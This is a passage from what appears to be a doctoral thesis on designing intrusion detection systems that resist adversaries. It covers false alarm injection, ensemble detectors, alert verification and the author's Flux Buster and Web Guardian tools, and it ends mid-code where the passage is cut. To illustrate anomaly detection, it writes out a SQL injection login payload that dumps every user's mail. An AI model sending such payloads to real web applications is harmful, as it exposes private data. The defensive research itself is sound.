Polymorphic blending attacks represent another relevant technique used to evade
IDS. To increase the robustness against such attacks, anomaly-based IDS that are
capable of detecting worm activities can be modeled as stochastic finite state
automata. Then, polymorphic blending attacks can be prevented by excluding those
transitions that are traversed frequently by multiple polymorphic blending attacks,
and that offer a relatively low contribution to discriminating between legitimate
activities and attacks [Fogla and Lee (2006)].

5.5.3.2 False alarm injection against Anomaly-based IDS

In the case of anomaly-based IDS, the problem of false alarm injection is quite
relevant. A pattern might be anomalous even if it does not represent an attack.
Thus, an adversary might conceive such patterns to flood the alert log of an anomaly

detector with false alarms. Intuitively, the patterns that originate false alarms
should exhibit characteristics directly associated with the features used to model
the legitimate traffic. In other words, an adversary should generate a well-specified
noise to perform false alarm injection. This noise is conceptually different from
the independent noise generated by legitimate patterns (erroneously) classified
as attacks. Whereas the independent noise is associated with false alarms due to
an incomplete model of legitimate patterns, the malicious noise might raise false
alarms because not all anomalous patterns represent attacks. Let us make a simple
example related to an anomaly detector for a web application. Most of the attacks
against web applications leverage input validation vulnerabilities. Let us refer to
a web application whose URI is /mail/index.php that, using the HTTPS protocol,
receives the user input through the POST method, and instantiates a SQL query
to a database containing all e-mails. The user logs on to the system by providing the
username and the password, e.g., user=john&password=3443ssa738dsh345. These
inputs can also be sent to an anomaly-based IDS by the web server. In this example,
there are two inputs: the first (john) is given through the user attribute and the
second (3443ssa738dsh345) is given through the password attribute. The acquired
input data can be used in the following query:

SELECT * FROM usersmail
WHERE user='john' AND pass='3443ssa738dsh345'

to retrieve the incoming mail of user john from the database, and send it
to the web client. If this application does not strip out the quote special
symbol ('), there is a vulnerability to SQL injection attacks. So,
if an attacker makes a POST request by providing the following inputs:
user='%20OR%20('a'='a&password=')%20OR%20'a'='a, the query becomes (%20
is the encoding of the space):

SELECT * FROM usersmail
WHERE user='' OR ('a'='a' AND pass='') OR 'a'='a'

which provides the attacker with the incoming mails of all users (the latter
equivalence 'a'='a' is always true).
An anomaly detector can inspect the two inputs, raising an alert if non-alphanumeric
characters are given. Thus, this anomaly detector can detect the attack of the
example, because some non-alphanumeric characters are necessary (i.e., the quote
character). Even if such an anomaly detector can detect every attack leveraging
input validation vulnerabilities, it can be overwhelmed by false alarms, as many
inputs containing non-alphanumeric characters are clearly not related to attacks. For
example, the input user=%20&password=%20 raises an alert even if it does not
represent an attack. Such a behavior is typical of anomaly-based IDS, as an anomaly
is not necessarily an attack. As anomaly detectors are very often implemented by
machine learning algorithms, this is a reason for the careful use of machine learning
techniques, as they can potentially produce a large volume of alarms compared to
the advantage of being able to detect novel attacks.
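The following minimal sketch (our own naming; the inputs are those of the example
above) shows both behaviors, i.e., the SQL injection is flagged, but so is the
harmless whitespace-only input:

# Minimal sketch of the naive anomaly check discussed above: flag any
# request parameter containing non-alphanumeric characters. It catches
# the SQL injection, but also flags harmless inputs (false alarm).
from urllib.parse import unquote

def is_anomalous(value: str) -> bool:
    return not unquote(value).isalnum()

# Legitimate login: no alert
print(is_anomalous("john"), is_anomalous("3443ssa738dsh345"))  # False False
# SQL injection from the example: alert (quote characters are anomalous)
print(is_anomalous("'%20OR%20('a'='a"))                        # True
# Injected benign noise: alert, even though it is not an attack
print(is_anomalous("%20"))                                     # True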

False alarm injection against Anomaly-based IDS: Solutions Even if it is
easier to inject false alarms into an anomaly-based IDS w.r.t. a misuse-based IDS, it is
also worth noting that a good knowledge of the features used by the IDS is necessary.
Thus, if such knowledge cannot be easily acquired, the over-stimulation impact can
be reduced. This result can be attained in those cases in which a high-dimensional
and possibly redundant set of features can be devised. Handling a high-dimensional
feature space typically requires a feature selection step aimed at retaining a smaller
subset of highly discriminative features, as learning in very high dimensional spaces
is not an easy task [Almuallim and Dietterich (1992)]. In order to exploit all the
available information carried by a high-dimensional feature space, ensemble
methods have been proposed, where a number of machine learning algorithms are
trained on different feature subspaces, and their results are then combined. These
techniques are currently used in the Intrusion Detection domain to improve overall
performance, and to harden the evasion task, as the function implemented after
combination is more complex than that produced by an individual machine learning
algorithm [Giacinto et al. (2003), Corona et al. (2008), Perdisci et al. (2006) (b)].
The advantages of ensemble methods are discussed in detail in Section 5.5.5.
Here, as discussed in Section 5.3.2, we propose a technique that should be further
investigated, as it can provide additional hardness of evasion and resilience
to false alarm injection. It is based on the use of randomness, so that, even if the
attacker has perfect knowledge of the features extracted from data and of the learning
algorithm employed, at each time instant he cannot predict which subset of
features is used. This can be achieved by learning an ensemble of different machine
learning algorithms on randomly selected subspaces of the entire feature set. Then,
these different models can be randomly combined during the operational phase. It
has already been shown that the combination of learning algorithms trained on a
random selection of subspaces may attain high performance [Ho (1998)]. In the case
of Intrusion Detection, we should also resort to a random selection of the members
of the ensemble. Provided that the learned models are sufficiently diverse, the
models may be randomly combined, and the result is typically more
accurate than the use of one individual model and of the entire feature space. In
addition, evasion and false alarm injection can be drastically reduced.
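The sketch below illustrates this idea under simplifying assumptions (synthetic
data, one-class SVMs as base learners, majority voting); it is not the exact scheme
of the cited works:

# Minimal sketch: anomaly detectors trained on random feature subspaces,
# randomly subsampled at detection time so the attacker cannot predict
# which features (and which models) are in use at any given instant.
import numpy as np
from sklearn.svm import OneClassSVM

rng = np.random.default_rng(0)
X_train = rng.normal(size=(500, 30))        # synthetic "legitimate" traffic

# Train each base detector on its own random subset of the 30 features.
subspaces = [rng.choice(30, size=10, replace=False) for _ in range(15)]
models = [OneClassSVM(nu=0.05).fit(X_train[:, s]) for s in subspaces]

def detect(x: np.ndarray) -> bool:
    # Randomly select a different subset of ensemble members per query.
    idx = rng.choice(len(models), size=7, replace=False)
    votes = [models[i].predict(x[None, subspaces[i]])[0] for i in idx]
    return sum(v == -1 for v in votes) > len(votes) / 2   # majority: anomalous?

print(detect(rng.normal(size=30)))      # usually False (in-distribution)
print(detect(np.full(30, 8.0)))         # usually True (far from normal data)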
The above solution can be used only in cases where a high-dimensional and
possibly redundant set of features can be extracted. As this depends on the type
of data that is analyzed, and on the characteristics of the service/application that is
protected, it is not always guaranteed that a random or pseudo-random selection of
features provides the desired accuracy. In any case, we should always keep in mind
that the design of learning techniques in an adversarial environment involves a
sequence of processing steps, each step involving different representations of the
available knowledge. The desired accuracy and robustness of an IDS should not be
required at each processing step, but in the final step only. Thus, typically, higher-level
refinement steps are necessary to discriminate between true alarms and false alarms.
On the other hand, if the security system has been completely evaded, i.e., if the
attacker has been able to hide all the traces of the attack, then no information can

be recovered. Consequently, at each intermediate step we must require hardness
of evasion, while the resilience to false alarm injection can be handled by high-level
processing steps designed to perform alert verification.

5.5.4 Classification and result analysis: The alert verification solution

Often, false alarms are related to unsuccessful attacks. For example, if the protected
network is based on one operating system platform (e.g., Windows), an IDS can raise
alarms even in case of attacks against other operating systems (e.g., Linux), even
if such attacks are not effective. This consideration has led to the concept of alert
verification [Kruegel et al. (2004)]. Such techniques are aimed at assessing whether
an attack related to an alert produced by the IDS actually succeeded or not.
Essentially, alert verification is a post-processing task of any pattern recognition
system, where contextual information is used to validate the output of the system. In
the case of IDS, alert verification allows coping with false alarms that are inevitably
generated by the IDS. In this sense, this technique can also address false alarm
injection in a general way.

Alert verification can be either passive or active [Kruegel et al. (2004)]. Passive
alert verification comprises checks based on a priori knowledge regarding the network
topology, the software installed in the monitored host(s), and the available network
services. For example, it can be verified whether a known exploit might be actually
dangerous for the destination host by checking if the attack prerequisites are satisfied.
Attack prerequisites are the conditions under which an attack is successful, e.g.,
vulnerable operating systems, vulnerable applications, availability of the network
services involved, etc.; it can also be verified whether certain packets reached a
certain destination or not. The main disadvantage of passive checks is that they
might be based on outdated information, and that some information cannot be
gathered a priori. Conversely, active alert verification comprises a set of checks
performed after an alert is raised. For example, it can be verified whether new
services (e.g., new applications and open ports) have recently been activated, whether
a denial of service is present, or whether critical file properties (e.g., permissions,
owner, size, content) have recently changed. These kinds of checks are always based
on up-to-date information, but, as they are gathered on-the-fly, they can interfere
with the normal operations performed by the network/host.
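As a toy illustration of an active check of the last kind (file paths and baseline
digests are illustrative placeholders), an alert concerning a host could trigger a
comparison of critical files against known-good hashes:

# Minimal sketch of an active alert-verification check: when an alert is
# raised for a host, hash its critical files and compare them against a
# known-good baseline; a mismatch supports the hypothesis that the
# alerted attack actually succeeded.
import hashlib
from pathlib import Path

BASELINE = {"/etc/passwd": "ab12...", "/usr/bin/sshd": "cd34..."}  # illustrative

def verify_alert(paths=BASELINE) -> list:
    changed = []
    for path, good_digest in paths.items():
        p = Path(path)
        digest = hashlib.sha256(p.read_bytes()).hexdigest() if p.exists() else None
        if digest != good_digest:
            changed.append(path)   # modified or missing critical file
    return changed

# A non-empty result is evidence supporting the validated alert.
print(verify_alert())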

An interesting aspect of alert verification is that, as a post-processing task, it
can handle errors made at each preceding step, as far as false alarms are concerned.
Of course, at this step attack detection cannot be improved.

Alert verification mechanisms have to be specifically designed according to the
IDS paradigm employed. For example, if a NIDS has been designed to handle
ambiguous traffic streams by instantiating separate analysis threads for each possible
interpretation of the traffic [Paxson and Handley (1999)], then it is possible to verify
whether the packet reassembling mechanism employed by the target host is vulnerable
to that attack. In the case of HIDS, active checks could be easily performed, as

they involve characteristics of the host itself, such as file system checks, analysis of
recently added files (in particular, executables), file modifications, etc. Other checks
may involve modifications in the system registry, or the addition of new users.

A misuse-based IDS can use passive check mechanisms to assess whether attack
prerequisites are satisfied, and whether typical evidence of a specific attack has been
observed. In this case, alert verification can be well defined, because attack
characteristics and the related effects are known in advance. In an anomaly-based
IDS, alert verification mechanisms may be more difficult to define, because only
legitimate patterns are known. On the other hand, anomaly-based systems provide
protection against new attacks and mutations of known attacks; the development of
these techniques may reduce the impact of the false alarms typically associated with
anomaly-based systems. For example, alerts raised by an anomaly-based system
designed to protect a web server can be verified by analyzing the outputs of the web
server.

In [Bolzoni et al. (2007)], an interesting approach to perform alert correlation is
proposed. In that paper, each TCP connection on a monitored host is inspected.
Inbound TCP traffic is inspected by one or more network-based IDS, whereas
outbound TCP traffic is analyzed by an anomaly detector. For each TCP connection,
the system keeps only the alerts for which the output of the monitored host(s) is
anomalous. This approach is reasonable, since most (successful) network attacks
produce some output on target machines that differs from normal outputs. The
authors in [Bolzoni et al. (2007)] show that this approach may be very effective
in reducing the false positive rate (suppressing from 50% to all of the false alarms),
without affecting the detection rate. It is interesting to note that an analogous
technique may be applied to different protocols/abstraction levels (e.g., to protect a
web server with host-based IDS), in order to provide more accurate and reliable
results, even for encrypted network connections.
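The following sketch captures the gist of this correlation under simplifying
assumptions (alerts and anomaly flags are keyed by a connection identifier; all
names are illustrative):

# Minimal sketch of output-based alert verification: keep an inbound NIDS
# alert only if the outbound traffic of the same TCP connection was also
# flagged as anomalous by the output anomaly detector.
def verified_alerts(inbound_alerts: dict, outbound_anomalous: set) -> dict:
    # inbound_alerts: conn_id -> alert description
    # outbound_anomalous: set of conn_ids with anomalous host output
    return {cid: alert for cid, alert in inbound_alerts.items()
            if cid in outbound_anomalous}

alerts = {("10.0.0.7", 4433): "possible exploit",
          ("10.0.0.9", 5121): "suspect payload"}
anomalous_out = {("10.0.0.7", 4433)}           # only this host replied anomalously
print(verified_alerts(alerts, anomalous_out))  # the second alert is discarded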

Alert verification typically requires performing alert correlation, aimed at handling
high volumes of alerts, and at providing the security administrator with high-level
information about what is occurring in a network. Alerts are validated by taking
into account other alerts produced either by the IDS itself, or by other network
appliances (e.g., firewall, router, etc.). At present, this task is a challenging open
research issue [Kruegel et al. (2005) (b)] [Bass (2000)], and it should be recognized
as a necessary step for effective intrusion detection deployment. This phase clearly
involves the use of high-level automatic reasoning techniques, as information is
represented and processed through high-level concepts, rather than low-level features
[Debar and Wespi (2001)]. In our opinion, the different roles and capabilities of
low-level feature processing and concept reasoning in the intrusion detection field
should be further investigated and assessed.

5.5.5 Classification and result analysis: solutions based on Multiple Classifier Systems

Multiple Classifier Systems (MCS), a.k.a. ensemble learning approaches, have been
applied successfully in many different research fields, among them the detection of
intrusions in computer systems. In the intrusion detection field, MCS are motivated
by the presence of different network protocols, multiple concurrent network
connections, distinct host applications and operating systems. Patterns extracted
from this heterogeneous domain are very difficult to characterize. In fact, it is very
difficult to take into account the domain knowledge as a whole in the design of the
classifier. In general, by increasing the number of features, the pattern recognition
task becomes even more complex and less tractable.
MCS provide a solution to address these issues. The intuitive advantage given
by the MCS approach is supported by the results in [Lee and Xiang (2001)], where
the complexity of the classification task is measured through an information theoretic
approach. The subdivision of the classification problem into multiple sub-problems
turns out to decrease the entropy of each subset of training patterns, which in general
coincides with the ability to construct a more precise model of the normal traffic.
The intrusion detection domain can be seen as the union of different sub-domains,
each one providing complementary information. A sub-domain can be characterized
by a specific:

abstraction level, i.e., a group of network protocols, user logins on different hosts;

place, i.e., software applications (managing the routing table) in a router, software
applications running in a host.

Each sub-domain can be decomposed and analyzed in more detail. For example,
considering a group of protocols at a specific abstraction level (e.g., HTTP, FTP
and SMTP), the related syntax and semantics can be implemented in the design of
service-specific classifiers. This allows for including the sub-domain knowledge, with
a more precise and clear modeling of patterns. Recent works clearly followed this
approach, focusing on the analysis of specific applications or services for this
capability.
A suitable MCS approach may cope with the adversarial environment in general.
For example, classifiers based on different training algorithms can be used for a
specific set of features: an adversary would need to inject different types of malicious
noise, each one conceived to affect a specific classifier of the ensemble. Also, such
noise could affect some feature subsets without significantly decreasing the overall
performance of the MCS. However, to date, the contribution of MCS against the
problem of learning in the presence of malicious patterns has to be further researched.
On the other hand, a recent paper showed experimentally that the MCS approach
is able to increase the robustness against an adversarial environment during the
classification phase of an IDS [Perdisci et al. (2006) (b)].
Finally, the MCS approach could be very helpful to implement effective alert
verification mechanisms. Using multiple, specific classifiers, it is possible to provide
specialized alerts and also more reliable alert verification processes. For example,
by using an application-specific classifier, it is possible to evaluate application
operations and outputs in a more detailed fashion, including the knowledge about this
specific sub-domain.

5.6 Storage box

An IDS is software that needs, at least, an operating system to interact with the
network, a storage element to store alerts and logs, and a reliable computer. Thus,
when discussing an adversarial environment against the so-called storage box, it is
useful to make a generalization and consider all the components that are tightly
coupled with the IDS. It is easy to see that all the components coupled with the
IDS are a possible source of weakness and can interfere with its work. An attacker
can thus leverage any one of these components to modify the behavior of the
IDS to his own benefit. That is, not only the detection engine should be designed
carefully, but the whole hardware and software architecture of an IDS should
be designed as carefully as the IDS itself. The meaning of the term careful depends
upon the security requirements of the application environment (e.g., bank, home,
public administration, . . . ). As an example, a perfect IDS is perfectly useless if the
underlying operating system has a significant vulnerability that allows an attacker
to gain administrative privileges on the computer and, then, shut down the IDS. For
these reasons, commercial network-based IDS/IPS solutions are typically appliances
made up of a comprehensive and complete hardware and software suite, with custom
hardware and operating system [IBM ISS IPS, Cisco IPS]. Thus, the vulnerability
of the IDS as a host in the protected network is reduced w.r.t. hosts that run public
services.
On the other hand, open-source network-based IDS/IPS solutions can be weaker
from this point of view, as they need a host machine and a host operating
system. As a consequence, to attain a reliable solution, a high-level knowledge of
the IDS itself and the related environment is needed to correctly choose and configure
the operating system and the host machine.

5.7 Countermeasure box

A passive IDS (i.e., an IDS that passively audits the network) is helpful to limit
intrusion damage, and provides useful information for future security improvements.
Unfortunately, a passive IDS cannot increase real-time security, as a response
by the security team typically requires a longer time compared to the dynamics of
attacks.

Intrusion Prevention Systems (IPS), which actively block attacks in real time, provide
an additional layer of security. For example, an IPS that acquires data from the
network can be capable of protecting against intrusions by blocking suspected actions,
thus avoiding that the suspected traffic reaches the protected hosts.

IPS are critical in an adversarial environment, as an attacker may stimulate the
countermeasures so that they are used against the protected network. An attacker
may trick an IPS so that a legitimate user is considered a suspect user by the
IPS, and thus the related traffic is blocked. This effect can be achieved by
the attacker by using the spoofed IP address of the legitimate user and launching
a number of portscans. In response, the IPS might block certain connections of

the victim, or deny access to certain services to protect the network. From the
point of view of the legitimate user, the attacker has realized a denial of service. In
addition, an adversary can easily infer the detection rules of the IPS if he is the
target of the countermeasure feedback. As a consequence, the adversary can evade
or over-stimulate the IDS.

Recently, a new approach to computer security has emerged: Active Intrusion
Prevention (AIP) [Green et al. (2007)]. Such an approach is based on a sort of
feedback from a suspected attacker. The AIP system examines all the activity on
the network, looking for requests for data that can potentially be aimed at breaking
into the network for hostile purposes. In these situations, the AIP system will provide
the requested data, which will be specially marked. If the attacker uses the marked
information, then the AIP has additional support for the hypothesis that the request
for data is related to an attack. In this manner, the AIP approach yields a more
accurate identification of hostile events. Other advantages of this approach include
early attack identification, and protection from both known and unknown attacks.
Further, the AIP system captures information about the originator of the attack,
thus enabling him to be blocked completely, preventing future attempts. In fact,
AIP programs routinely accumulate and compile data on the attacker, the attacked
system, and the setting under which the activities occurred. This data can be used
for more comprehensive statistical analysis that can provide guidelines for setting
up and managing effective security measures for the entire network.

AIP is a very interesting approach, but what is its impact for high network
bit-rates? Also, the robustness of such an approach needs to be investigated. AIP
may also suffer from the same problems as IPS, i.e., an attacker may spot the
marked data and thus exploit this information to evade detection.

As countermeasures are essentially attacks that the defender carries out against
the attacker, it should be clear that in this case the attacker plays the role of the
defender, and, as a consequence, all the techniques typically used for detecting
intrusions can be used by the attacker to look for countermeasures. Thus,
countermeasures should be carefully designed, as they can be used by the attacker
to gain knowledge about the security mechanisms employed by the protected network.

5.8 Discussion

Intrusion Detection Systems operate in a hostile environment. This aspect cannot
be neglected if the goal is to design (or choose) reliable and robust IDS solutions.
However, it is clear that this goal is not easy to achieve. For this reason, in this
Section we summarize the key aspects which derive from our analysis.

First of all, each IDS solution should be thoroughly tuned to the specific intrusion
detection problem. That is, depending on the key asset we need to protect, a
different IDS solution is necessary. There is no general solution for intrusion
detection. The more generic the IDS solution, the less effective it will be.
Thus, the knowledge of the strengths and weaknesses of different design choices is
of key importance.

Figure 5.3: Summary of the pros/cons of host and network data acquisition. Dotted
arrows indicate some proposed solutions to cope with the cons of each acquisition
method.


Network-based IDS may be fooled by leveraging any difference between the
traffic reconstruction (view) of the network sensor(s) and that of the destination
host(s). The key point is that NIDS are fundamentally disadvantaged when the
detection of attacks requires the emulation of host-side processing. Thus, in our
opinion, when possible, NIDS should be deployed to detect attacks which are clearly
network-based, e.g., portscan, SYN flooding, Distributed DoS, botnet probing events.
This is because, in order to reliably detect these attacks, we do not need any emulation
of host-side traffic processing. Since this approach focuses on a specific attack
category, it may also increase the performance of network sensors.

On the other hand, host sensors should be employed to monitor the host-side
applications/operating systems. The deployment of host sensors should be carefully
chosen in order to monitor the behavior of the systems which manage the key asset
(information) we need to protect. Of course, host sensors may be disabled after the
target machine is compromised. Also, if the attacker exploits some vulnerability
in the system which provides the input data to the host sensor, it may be evaded.
As discussed in Section 5.1.2, a robust solution may be based on Virtual Machine
Introspection. In our opinion, this is the most powerful solution to strengthen the
host data acquisition phase, if applicable.

Figure 5.3 summarizes the pros and cons of host and network data acquisition. We
highlight some proposed solutions to cope with the cons of each acquisition
method. From the figure, it is evident that the practical choice of the acquisition
method should consider many different factors. However, this scheme is useful to
quickly focus on the acquisition choices that allow attaining the best trade-off
between IDS reliability and practical sensor deployment.

From a research point of view, it is interesting to correlate network and host
data to further strengthen the IDS design. This is because, for an adversary, it is
more difficult to simultaneously affect both network and host sensor measurements.
In particular, this correlation may be based on data reconciliation techniques
[Corona et al. (2009)]. For example, we may measure the same variable from both
a network node and a host sensor, and then check whether the two values match
or not. If the two values do not match, there are two most probable cases: (1) a
successful attack against the target host affected the host sensor measurement; (2)
the network sensor has a flaw in the network traffic reconstruction (this may be due
to an evading attack against the network sensor). A similar approach may be useful
to correlate information between different host sensors (e.g., placed in different hosts
which are exchanging information) or different network sensors (e.g., which share a
common traffic flow).
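A minimal sketch of this consistency check follows (the measured variable, a
per-connection byte count, and the tolerance are illustrative assumptions):

# Minimal sketch of data reconciliation between sensors: compare the same
# variable (here, bytes observed for a connection) as measured by a network
# sensor and by a host sensor; a mismatch flags either a compromised host
# sensor or a flawed traffic reconstruction at the network sensor.
def reconcile(net_bytes: int, host_bytes: int, tolerance: float = 0.01) -> bool:
    reference = max(net_bytes, host_bytes, 1)
    return abs(net_bytes - host_bytes) / reference <= tolerance  # consistent?

print(reconcile(10_240, 10_240))   # True: measurements agree
print(reconcile(10_240, 4_096))    # False: investigate both sensors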

As with the data acquisition choice, the choice of the detection method
should thoroughly consider the specific intrusion detection problem. In our opinion,
anomaly-based intrusion detection is the most promising technique for future
IDS solutions. The key point is that hundreds of new (never-before-seen) attacks
are developed on a daily basis. These attacks are perhaps the most threatening
ones, since they may not be detected by misuse-based IDS, and their effects are
unknown. Also, automatic training mechanisms for anomaly-based detectors may
be easily (and reliably) applied. Conversely, automatic training mechanisms for
misuse-based detectors may be exposed to attacks, because the main information
source is the attacker itself (see Section 5.5.2). For example, an MCS architecture
may be built, providing independent and specialized anomaly detectors. Such a
subdivision may be driven by the a priori knowledge of the problem, i.e., we may
subdivide the intrusion detection problem into multiple subproblems. In such a way,
each anomaly detector may spot a particular category of attack. Then, for each
anomaly sensor, a well-suited alert verification technique and a different countermeasure
may be defined. The correlation of the outputs from multiple anomaly
sensors may help us to both (1) further reduce the false positive rate, and (2) gain a
more thorough analysis of the events occurring on computer network(s)/host(s).

Figure 5.4 summarizes the pros and cons of anomaly- and misuse-based detection.
From such a figure, it is easy to see that, since the two methods are complementary,
they should be used concurrently (if possible). However, in our opinion anomaly-based
detection needs further research, since its pros are really relevant to most
current intrusion detection problems.

We now aim at giving the reader a brief, practical scheme to support the
design of IDS. This scheme is made up of eight points:

(1) What is the key information (asset) you need to protect? Clearly define what
the relevant information is.

(2) Identify all (security-)relevant systems, i.e., each system which manages or
carries such a piece of information. Assign to each system Si a degree of
relevance αi (e.g., from 0 to 1). This degree may be evaluated by considering
how the information is affected after the system is jeopardized.

(3) Assign a degree of weakness βi to each relevant system Si (e.g., from 0 to
1). For example, you may evaluate this degree by analyzing the most common
attacks (e.g., from the MITRE CVE archive). Also, you should consider
the exposure of the system to attacks, i.e., how many users may access
it. Furthermore, typically, the more the architecture and the
configuration of Si are suited to its task, the more difficult it is for an attacker
to find vulnerabilities (e.g., vulnerabilities due to default configurations or
common, vulnerable architectures).

(4) Let wi be the degree of security vulnerability introduced by the system Si,
computed as wi = αi · βi. Consider the system Si having the highest value of
wi.

(5) Carefully evaluate the pros and cons of the data acquisition methods in fig. 5.3
and the typology of input data of Si. Choose the best tradeoff between the
reliability of acquired data and the constraints on sensor deployment imposed
by system Si (and its environment). You may provide data fusion mech-
anisms to correlate data acquired from network and host sensors (e.g., using
data reconciliation techniques).

(6) Choose a suitable detection strategy for Si, carefully evaluating the pros and
cons of each detection method in fig. 5.4. You may correlate the information
related to known attacks (misuse-based) and detected anomalies (anomaly-based)
to further enhance the situational awareness about security-related events.

(7) Provide automatic alert verification and counteraction techniques, depend-
ing on the type of attacks (or anomalies). The more these techniques are suited
to system Si, the higher their reliability. Automatic counteractions should be
taken in response to events that are classified as attacks (or anomalies) with
a high level of confidence. In order to validate the alerts, you may need to ac-
quire more data from the network or hosts. For example, you may validate an
alert if the output of Si is anomalous, in analogy with the approach proposed
in [Bolzoni et al. (2007)]. On the other hand, for each validated alert, you
should provide an automatic counteraction, aimed at protecting your key
asset. For example, you may decide not to perform a database query if that
query is generated by a system for which the IDS has just raised an alert.
Furthermore, you should evaluate whether automatic actions may be turned
against the protected asset.

(8) At this point, update the value of wi after the adoption of the IDS solution for
Si, and go back to point (4). You should iterate until the expected security level,
which may be evaluated as 1 − maxi(wi), is reached; the security budget
should be sufficient to reach this level (a compact sketch of this loop follows).
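
The following fragment is a compact sketch of points (4)-(8), under strong simplifying assumptions: the degrees αi and βi are given, the security budget is modeled as a maximum number of iterations, and adopting an IDS solution for a system is modeled as reducing its weakness by a hypothetical mitigation factor. None of the numeric values are part of the scheme itself.

```python
# A compact, hypothetical sketch of the iterative scheme above.
# The alpha/beta values, mitigation factor and budget are illustrative
# assumptions, not prescribed by the original scheme.

def design_loop(systems, target_security=0.9, mitigation=0.5, budget=5):
    """systems: dict name -> (alpha, beta); iterate points (4)-(8)."""
    w = {name: a * b for name, (a, b) in systems.items()}  # w_i = alpha_i * beta_i
    for _ in range(budget):                                # security budget
        if 1 - max(w.values()) >= target_security:         # point (8): stop when reached
            break
        worst = max(w, key=w.get)  # point (4): system with the highest w_i
        # Points (5)-(7): choose acquisition, detection, verification and
        # counteraction for `worst`; modeled here as reducing its weakness.
        w[worst] *= mitigation
    return w, 1 - max(w.values())

systems = {"web_server": (1.0, 0.8), "db_server": (0.9, 0.4), "dns": (0.3, 0.5)}
print(design_loop(systems))
```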

A graphical description of this scheme is depicted in fig. 5.5. These points
may also be used as a reference to choose among different commercial/open-source
IDS solutions. In this case, we should choose the solution that lowers the value of
maxi(wi) the most. Data preprocessing, feature selection, and model selection steps
may be further defined for each system Si, following the discussion in Sections 5.2,
5.3, and 5.4, respectively.

Figure 5.5: Our proposed guideline for the design of robust IDS solutions that cope
with an adversarial environment. For details regarding the choice of data acquisition
and detection methods, refer to figs. 5.3 and 5.4, respectively.

5.9 Conclusions and future work


Computer security is a research field that must face the presence of an adversary.
The adversary is motivated to break security policies and evade security mechanisms
with minimum effort. Attack techniques are becoming ever more sophisticated,
and cyber-criminal activities ever more coordinated. Thus, Intrusion Detection
Systems play an increasingly important role in computer security. IDS perform
a pattern recognition task, i.e., they distinguish between legitimate patterns and
attack patterns in computer systems. As far as computer security is concerned, IDS
must cope with an adversarial environment.

This aspect cannot be neglected if the goal is to design reliable and robust IDS
solutions. Our contribution is a detailed study of IDS in the context of the ad-
versarial environment. We subdivided the design process of an intrusion detection
system into 7 steps, and then analyzed in detail the impact of the adversarial
environment on intrusion detection systems, in each of the different phases and
components of their design. This analysis has been exploited to gain a wide knowl-
edge of the problem statement, by critically reviewing related work in terms
of problem formulation, contributions, and proposed solutions. Then, we evidenced
the pros and cons of each of the main IDS classes, and suggested how to
address the cons. Our study can be employed as a reference both to design robust
IDS solutions and to evaluate the quality of different IDS solutions.
Future work is necessary to evaluate experimentally (and theoretically) the bene-
fits of an adversary-aware design of IDS solutions. Finally, we hope that the results
of our study can serve as a foundation for new, interesting approaches to the
detection of cyber-attacks.
Chapter 6

Concluding remarks

Most of today's Internet security threats are associated with the World Wide Web
(or simply, the web). This thesis addressed some of the key problems of today's web
security. In particular, it presented two research tools developed during the
three-year PhD course, namely Flux Buster and Web Guardian. These two tools
were conceived to improve both client-side and server-side web security.

Through Flux Buster we may accurately characterize and detect fast flux net-
works, regardless of the way they are advertised. As mentioned in Section 3.1, fast
flux networks are an emerging, pervasive threat to Internet security. They
are nowadays adopted by criminal organizations to host malicious websites that
support an enormous number of scams. We showed experimentally that, by means
of our system, we may enhance the security of web users. First, we may comple-
ment the state-of-the-art protection offered by Google Safe Browsing to current web
browsers. Furthermore, we may detect suspicious websites in real time. This
allows for advanced real-time protection of web users, as well as increased
effectiveness of spam filters.

On the other hand, by means of Web Guardian we may protect web services.
Web Guardian is able to accurately detect web attacks targeting either the web server
or web applications, for both encrypted (HTTPS) and unencrypted (HTTP) web
traffic. In particular, its features allow the detection of input validation attacks,
the most popular and threatening attacks to date. The key contribution of Web
Guardian is that its training is fast and does not require supervision. Moreover,
its anomaly-based approach allows for the detection of both known and unknown
attacks. Finally, our system provides detailed information about anomalous requests
and may provide automatic counteractions, to prevent both known and unknown
exploits.

Thus, our research may significantly benefit state-of-the-art Internet secu-
rity. However, in this thesis we presented a more general contribution. Current
security trends suggest (and we strongly believe) that future IDS solutions must
be adversary-aware, to cope with the increasing sophistication of attacks and ex-
ploitation techniques. That is, it is not sufficient to face current attacks: we must
also consider how a hostile adversary may affect the reliability of our IDS solutions.
In spite of the high number of related works, an overall picture of the problem is
still lacking. Thus, we studied this problem and critically reviewed previous work
to outline a general guideline for the development/choice of adversary-aware IDS
solutions. This guideline is very helpful (and necessary), since the problem is fairly
complex and depends upon many uncertain variables. On the other hand, to the
best of our knowledge, this is the first work that performs such an extensive study.
It is worth noting that our detection systems reflect many of the key points we
outline for adversary-aware IDS solutions (see Section 5.8):

• Flux Buster

– It adopts passive network data collection. This is suitable, since fast flux
networks are entities that can be reliably evidenced at the network level. Also,
it works in a stealthy way. On the contrary, active approaches to the
collection of DNS data (i.e., automatic resolution of suspicious domain names)
may be easily detected (and thus defeated) by miscreants who control
authoritative DNS servers.

– Miscreants may inject noise into the data collected by Flux Buster, but
for them it is counterproductive. This is because the domain name resolu-
tion is performed by Internet users, and returning legitimate IP addresses
may actually reduce the effectiveness of fast flux domain names. In any
case, we may filter our pool of flux agents, for example, by removing IP
addresses pointing to the most popular websites (see the sketch after this list).

– Miscreants may tune their flux domain names so that the features used
by Flux Buster are not sufficient to distinguish them from legitimate
services, such as CDNs. If so, Flux Buster may not detect them. However,
this may be difficult, since miscreants typically have no control over the
uptime of flux agents. In any case, we may easily extend (and improve)
the set of discriminant features modeled by Flux Buster.

• Web Guardian

– The anomaly-based approach allows Web Guardian to provide protec-
tion against unknown vulnerabilities in web servers and web applica-
tions. Also, this approach is more difficult to evade than the signature-based
approaches adopted by most Web Application Firewalls.

– The design of Web Guardian copes with attacks inside the set of web
requests used to infer the normal (legitimate) traffic profile. Thus, under
the reasonable assumption that malicious requests are fewer in number
than legitimate requests, it is difficult for miscreants to affect the learning
phase of our system. Also, we keep track of the number of samples of
each model to evaluate its reliability. This is important to cope with false
alarms and to provide well-suited counteractions.

– Desynchronization attacks against Web Guardian are difficult (see Sec-
tion 5.1.1.1), since input data is acquired directly from the web server.
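
Regarding the noise-filtering step mentioned in the Flux Buster list above, the following minimal sketch illustrates the idea; the source of the popular-site IP addresses (e.g., a top-sites list resolved offline) is an assumption, not part of the system as described.

```python
# A minimal sketch of the flux-agent pool filtering mentioned above:
# candidate IP addresses that also serve highly popular (presumably
# legitimate) websites are removed from the pool. The popularity source
# is a hypothetical, precomputed set of IP addresses.

def filter_flux_agents(candidate_ips: set, popular_site_ips: set) -> set:
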